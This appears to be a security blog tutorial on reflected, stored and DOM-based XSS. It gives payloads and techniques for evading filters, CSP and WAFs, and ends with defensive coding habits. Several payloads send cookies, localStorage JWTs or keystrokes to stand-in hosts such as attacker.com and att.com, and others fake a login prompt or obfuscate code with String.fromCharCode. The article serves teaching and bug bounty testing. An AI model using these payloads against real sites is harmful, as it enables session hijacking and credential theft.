Skip to main content

Practical XSS: DOM vs Reflected vs Stored — Advanced Payloads & Bypasses

Practical XSS: DOM vs Reflected vs Stored in 2025 (Payloads & Bypasses)

If you hunt bugs, run red teams, or build web apps, XSS still matters in 2025. It is one of the easiest ways to jump from “weird UI bug” to full account takeover, even on big platforms.

Cross-site scripting (XSS) is when an attacker runs their own JavaScript in someone else’s browser using a vulnerable site. The three main flavors are simple to say, hard to defend: reflected XSS (comes back in a single response), stored XSS (saved on the server), and DOM-based XSS (triggered by client-side code).

This guide focuses on real payloads and modern bypass tricks, not just alert(1). You will see how attackers build and adapt payloads for each type, and how filters, CSP, and WAFs can fail in practice. It is written for people who already get basic HTTP and HTML and want to level up their XSS game.


Quick XSS refresher: DOM vs reflected vs stored in simple terms

Close-up of Scrabble tiles spelling 'data breach' on a blurred background
Photo by Markus Winkler

In 2025, XSS is still one of the most common web attacks. Recent reports show it again takes a big share of real traffic, often chained with other flaws like weak session handling or open redirects. A single working XSS can move an attacker from “guest user” to “owning an admin account” in a few steps.

Here is the short refresher.

Reflected XSS means the payload travels with the request, usually in the URL, query string, or a form field. The server reflects that value into the response without proper output encoding. The victim has to load a malicious link, submit a form, or use a poisoned feature. It hits once, in that single response.

Stored XSS means the payload is saved on the server, for example, in a comment, profile field, or support ticket. Later, when any user views a page that shows that stored value, the script runs in their browser. This scales very well for attackers and is often rewarded more in bug bounty programs because of the wide impact. DOM-based XSS happens fully in the browser. Client-side JavaScript takes data from a source, such as location.hash or localStorage, and writes it into a dangerous sink, such as innerHTML or eval, without escaping. The server response can be perfectly safe, yet the client code still turns user-controlled data into script execution. This is especially common in single-page apps and heavy front-end frameworks.

For a deeper reference while reading, you can keep the PortSwigger XSS cheat sheet open as a side tab.

What cross-site scripting (XSS) actually lets an attacker do

Running JavaScript in someone else’s browser means you get to act as that user inside that site.

With a working XSS, an attacker can:

  • Steal cookies or tokens and reuse the victim’s session
  • Read private data that is only visible when the victim is logged in
  • Fake login prompts or support popups to collect passwords or credit card data
  • Log keystrokes in sensitive forms
  • Trigger actions on behalf of the victim, such as changing the email or turning off MFA

Picture a social network where profile comments are vulnerable. An attacker posts a comment that silently sends each viewer’s session token to a remote server. Anyone who scrolls past that comment can lose their account.

Or think about a search page in a corporate dashboard. A reflected XSS in the search parameter can become a phishing link that steals an administrator’s session and opens the door to full system control.

This is why modern XSS guides for bug bounty hunters treat it as more than just “pop an alert.”

How reflected XSS works in real websites

Reflected XSS is about echoing input right back to the user.

Common sources:

  • Query parameters in URLs
  • Form inputs are shown again on an error or results page
  • HTTP headers written into responses without escaping

The attacker crafts a URL that includes the payload, sends it to a victim, and waits. When the victim visits that URL, the server returns a page that includes the unescaped input, the browser parses it, and the script runs.

Example: a search page that prints You searched for: <user input> without encoding. The attacker sends:

https://example.com/search?q=<script>alert(1)</script>

Only victims who follow this crafted link will see the payload. Because of this, reflected XSS often needs social engineering, which is why it is usually the first style beginners find and exploit in bug bounty programs.

How stored XSS stays on the server and hits many users

Stored XSS is more dangerous because the payload sits “waiting” on the server.

Typical storage points:

  • Blog comments or guestbooks
  • User bios and profile fields
  • Support tickets or admin notes
  • Chat messages or forum posts

When the app displays that stored content without safe output encoding, every user who views it can trigger the payload. One malicious comment on a busy page can hit thousands of users, including admins and staff.

Bug bounty programs often pay more for stored XSS because the blast radius is bigger, the attack does not need a special link, and it is easier to chain into higher impact, such as full account takeover or data theft.

Why DOM-based XSS is harder to spot and block

DOM-based XSS lives inside the browser’s JavaScript runtime.

Client code reads from unsafe sources, such as:

  • location.hash or location.search
  • document.referrer
  • localStorage or sessionStorage
  • window.postMessage data

Then it sinks that data into dangerous APIs like innerHTML, outerHTML, document.write, eval, or setTimeout with a string.

Because the payload may sit in the URL fragment or inside local storage, the server never sees the final malicious string. Traditional scanners and simple WAF rules that only inspect HTTP traffic often miss it.

This style is very common in modern SPAs where front-end code builds the page from dynamic data. Developers trust anything that “comes from our own app,” forget that attackers control the browser too, and skip proper encoding.


Practical XSS payloads: DOM vs reflected vs stored with real 2025 examples

In 2025, attackers still use classic XSS tricks, but combine them with smarter payloads and chains. Public collections like GitHub’s xss-payload-list show how large and creative these payload sets have become.

Here is how payloads look in practice for each type.

Reflected XSS payloads that slip through basic filters

Start with the obvious case:

<script>alert(1)</script>

Many apps now block bare <script> tags. Simple filters may blacklist that word, but forget that event handlers also run JavaScript.

Example using an image tag:

<img src=x onerror=alert(1)>

If the filter strips script but does not touch attributes like onerrorThis works. Attackers often URL-encode the payload so the page still looks harmless:

https://example.com/search?q=%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E

To move from proof of concept to impact, attackers read data such as document.cookie Or CSRF tokens inside the page:

<img src=x onerror="fetch('//attacker.com/?c='+document.cookie)">

Filters that look only for the word cookie Are weak. Attackers can split strings, change case, or concatenate pieces:

<img src=x onerror="fetch('//att.com/?d='+document['coo'+'kie'])">

Or they use link or button handlers:

<a href=# onclick="alert(1)">Click</a>

Even if the app tries to remove script tags, these reflected payloads can still slip through.

Stored XSS payloads that quietly steal data or hijack sessions

Stored XSS payloads usually live in comments, bios, or chat messages. Low-profile payloads are more dangerous than noisy alerts.

Simple cookie exfil in a comment:

<img src=x onerror="this.remove();fetch('//attacker.com/?c='+document.cookie)">

The this.remove() call hides the broken image, so casual users might not see anything wrong.

Attackers also go after localStorage, where many SPAs keep JWTs or session data:

<img src=x onerror="fetch('//att.com/?t='+localStorage.getItem('jwt'))">

Longer-lived payloads can log keystrokes in a form:

<input oninput="fetch('//att.com/k?c='+this.value)">

Or inject a fake login form:

<div id=login>Session expired. Please log in again.</div>

Combined with extra JS attached via onload or onclickThis can steal passwords while users think they are still on the real site.

When stored inside attributes, text, or script blocks, payloads must match the HTML context. An attribute payload must close quotes, plain text payloads often start with <script> or <img>Script block payloads may use </script tricks to break out. Small context errors break the page, so experienced attackers tailor the payload’s shape to the exact sink.

DOM-based XSS payloads that abuse innerHTML and the URL

A classic DOM XSS case in a SPA:

const hash = location.hash.substring(1);
document.getElementById('message').innerHTML = hash;

If the attacker sends a URL like:

https://example.com/#<img src=x onerror=alert(1)>

The app reads the fragment, writes it into innerHTML, and the image’s onerror runs.

Another pattern combines multiple sinks to sidestep simple defenses:

const q = new URLSearchParams(location.search).get('q');
document.body.innerHTML = q;
setTimeout(function () { /* code that interacts */ }, 0);

Even if filters strip script tags, they may still let <svg onload=...> Or similar elements through:

<svg onload=alert(1)>

Because modern apps glue together many DOM operations, attackers often chain sources and sinks, for example, hash to innerHTML, then innerHTML to another function, until they reach script execution.


Modern XSS bypass tricks: beating filters, CSP, and WAF rules

In 2025, XSS defense is less about one magic setting and more about layers: correct output encoding, smart filters, solid CSP, and aware WAF rules. Attackers answer by mixing encoding, obfuscation, and less obvious event handlers. Recent articles on advanced XSS techniques in 2025 show how creative these evasion tricks can get.

Getting around simple filters and HTML sanitizers

Many sites still apply naive input filters. They remove <script> tags or block some keywords like onerror But leave other dangerous pieces.

Attackers respond with:

  • Harmless-looking tags such as img, svg, video, or a
  • Event handlers like onload, onmouseover, onclick, or onfocus
  • Broken words, mixed case, or extra characters

Examples:

<scr<script>ipt>alert(1)</scr</script>ipt>

or

<imG sRc=x oNeRrOr=alert(1)>

Some filters search for exact strings. Browsers are more forgiving and ignore extra whitespace or control characters that filters do not handle.

Context also matters. A sanitizer that escapes HTML characters may still leave dangerous content inside a JavaScript string:

<script>
  var msg = "USER_INPUT_HERE";
</script>

In this case, breaking out of the string and adding your own code is enough, even if < and > are escaped elsewhere.

Bypassing Content Security Policy (CSP) in the real world

Content Security Policy tries to control where scripts come from and how they run. Common goals:

  • Block inline scripts
  • Restrict script sources to a few safe domains
  • Stop the use of eval and similar APIs

In practice, CSP is often misconfigured. Some apps still allow unsafe-inline or unsafe-eval, which opens the door to simple payloads like:

<button onclick="setTimeout('alert(1)', 0)">Click</button>

If CSP allows scripts from a CDN or a specific API endpoint, attackers might find a way to host or reflect JavaScript from that allowed origin, then load it from their payload.

Old JSONP-style endpoints are another weak spot. If CSP allows https://api.example.com for scripts, and that host has a reflection endpoint, an attacker can turn it into a loader for their own JS.

Even when CSP blocks inline<script>, it may still allow inline event handlers or data URLs inside attributes, which attackers can abuse for stored or DOM-based XSS.

Evading WAF and security tools with encoding and obfuscation

Web Application Firewalls and scanners often look for obvious strings like <script>, onerror=, or alert(. To avoid these patterns, attackers combine:

  • URL encoding or double encoding
  • HTML entities like &#x3c; for <
  • JavaScript obfuscation, such as String.fromCharCode

Simple example, alert built from char codes:

<script>
  eval(String.fromCharCode(97,108,101,114,116,40,49,41));
</script>

A smart WAF may still catch this, so attackers mix multiple tricks, split strings over attributes, or hide code inside less common tags.

They also try to keep payloads short and natural-looking. An admin reviewing a support ticket is more likely to click through a subtle broken image than a massive block of scrambled text.

For a research view on where detection is heading, the paper on AI-driven XSS detection, GenXSS, is worth reading.


Conclusion: leveling up against DOM, reflected, and stored XSS

DOM, reflected, and stored XSS all come down to the same core idea: untrusted data becomes active JavaScript in the browser. Modern payloads favor attributes, event handlers, and a DOM sinkinnerHTML, not only old school <script> tags. Filters, CSP, and WAFs help, but weak or partial setups can still be bypassed with clever encoding and context-aware payloads.

For developers and testers, a few clear habits go a long way:

  1. Use the right output encoding per context, for HTML, attributes, JavaScript, and URLs.
  2. Avoid unsafe DOM sinks, or sanitize before calling. innerHTML, eval, or similar APIs.
  3. Deploy a strong CSP that blocks inline scripts and tightens allowed script sources.
  4. Test with real browsers, modern tools, and up-to-date cheat sheets.
  5. Treat user-supplied HTML as hostile, and review any “rich text” or HTML feature very carefully.

Practice in legal labs or bug bounty platforms, keep your payload skills fresh, and you will stay ahead of both simple XSS bugs and the more advanced chains that define XSS exploitation in 2025.

Comments

Popular posts from this blog

API Authorization Flaws (Broken Object Level & Function Level Auth)

  API Authorization Flaws: BOLA and BFLA Explained for Real-World Security APIs are the hidden pipes that keep modern apps running. Your banking app, ride sharing app, and social media feed all depend on APIs to send and receive data behind the scenes. When those APIs make simple mistakes in authorization , private data leaks. You do not always need complex malware. Often, attackers just change an ID or call a hidden function. Two of the worst mistakes are Broken Object Level Authorization (BOLA) and Broken Function Level Authorization (BFLA). Both BOLA and BFLA appear in the OWASP API Security Top 10 that teams still follow as of 2025, based on the latest 2023 list, where BOLA is ranked number 1 and BFLA is number 5. This post breaks down what these flaws are, how attackers abuse them, and clear steps your team can take to prevent them. What Are API Authorization Flaws and Why Do They Matter? Photo by Markus Winkler To understand API authorization flaws, start with two si...

Chain Exploits: From Information Leak to RCE in 2025

 Chain Exploits: From Information Leak to RCE in 2025 A lot of people picture hacking as one big magic trick. In reality, most modern attacks are a chain of small, boring bugs that line up in a very bad way. Two of the most dangerous links in that chain are an information leak and remote code execution (RCE). An information leak is any bug that reveals data that should stay private. RCE is a bug that lets an attacker run their own code on your server or node from far away. On their own, each bug might look minor. Together, they can give an attacker full control of your web app, CI pipeline, or blockchain stack. In 2025, with DeFi protocols, Web3 dashboards, and npm-heavy codebases everywhere, this pattern is more common than people think. This post walks step by step from a tiny leak to full system control, using simple language and real style examples from npm supply chain attacks and DeFi exploits. What Is a Chain Exploit and Why Does It Matter for Security in 2025? A chain explo...